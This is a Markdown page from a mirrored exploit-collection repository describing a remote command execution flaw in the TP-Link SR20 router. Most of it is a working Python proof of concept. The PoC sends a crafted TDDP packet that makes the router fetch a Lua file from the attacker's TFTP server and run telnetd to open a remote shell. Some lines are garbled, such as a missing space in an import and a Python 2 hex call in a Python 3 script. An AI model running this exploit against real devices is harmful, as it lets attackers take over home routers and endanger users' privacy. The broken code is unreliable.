admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/TP-Link SR20 远程命令执行.md
Threekiii e9e1a4597a init
2022-02-20 17:08:56 +08:00

45 lines
1.3 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# TP-Link SR20 远程命令执行
## 漏洞描述
据外媒报道著名安全专家、Google 安全工程师Matthew Garrett公开了TP-LINK SR20智能家居路由器一个“允许来自本地网络连接的任意命令执行”的漏洞。攻击者可通过该漏洞控制用户路由器借此执行任意命令危及用户隐私安全。
## 漏洞影响
```
TP-Link SR20
```
## 漏洞POC
```python
#!/usr/bin/python3
# Create /testfile in your tftp root directory with the followingcontents:
#function config_test(config)
# os.execute("telnetd -l/bin/login.sh")
#end
# Replace 192.168.0.1 with the IP address of the vulnerable device
importbinascii
importsocket
port_send = 1040
port_receive = 61000
tddp_ver = "01"
tddp_command = "31"
tddp_req = "01"
tddp_reply = "00"
tddp_padding = "%0.16X"% 00
tddp_packet = "".join([tddp_ver, tddp_command, tddp_req,tddp_reply, tddp_padding])
sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_receive.bind(( '', port_receive))
# Send a request
sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = binascii.unhexlify(tddp_packet)
packet = packet + b"/testfile;arbitrary"
print(packet)
sock_send.sendto(packet, ( "192.168.0.1", port_send))
sock_send.close()
response, addr = sock_receive.recvfrom( 1024)
r = response.encode( 'hex')
print(r)
```
Reference in New Issue View Git Blame Copy Permalink